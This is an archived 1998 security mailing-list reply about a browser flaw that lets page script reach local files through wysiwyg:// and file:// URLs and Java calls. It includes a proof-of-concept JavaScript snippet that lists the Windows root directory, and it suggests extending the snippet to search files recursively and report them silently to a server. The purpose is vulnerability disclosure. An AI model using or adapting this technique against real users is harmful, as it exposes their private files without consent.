This security hole is not limited to knowing a specific file name,
it can be used to list the contents of a directory, which I believe is
much more insidious. This script can send a list of the files in the
user's root directory under windows:
sl=window.open("wysiwyg://1/file://C|/");
sl2=sl.window.open();
sl2.location="javascript:"+
"b=\"Here is the files in your root directory:\";"+
"var f=new java.io.file(\"C:\\\\\");"+
"var files=f.list();"+
"for (var x=0;x<files.length;x++){"+
"b+=files[x]+\"\n\""+
"};"+
"alert(b);";
(Simple to modify it for UNIX)
Using a search algorithm the script could search for specific
files by running this recursively. The only problem (from a hacker's
perspective, a good thing from our perspective) is all of the windows it
would open. If a way could be worked around this (which I think it can),
this script could run without a user even knowing it, searching the user's
directories and reporting them to a server.
Sincerely,
Terence C. Haddock
On Wed, 25 Nov 1998, Ben Collins wrote:
> Seems I was proven seriously wrong, *swallows pride*. Only limitations I
> see is that you do have to know the file name and path contrary to the
> original post, and as stated by the person who conducted the test, it is
> platform specific (he had to change it to work on this unix system). Not
> trying to dilute the problem, just noting some things.
>
> Apologies for the error in my statements, but isn't it much nicer to see
> it _really_ work?
>
> --
> ----- -- - -------- --------- ---- ------- ----- - - --- --------
> Ben Collins <b.m.collinsat_private> Debian GNU/Linux
> UnixGroup Admin - Jordan Systems Inc. bcollinsat_private
> ------ -- ----- - - ------- ------- -- The Choice of the GNU Generation
>
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:24:15 PDT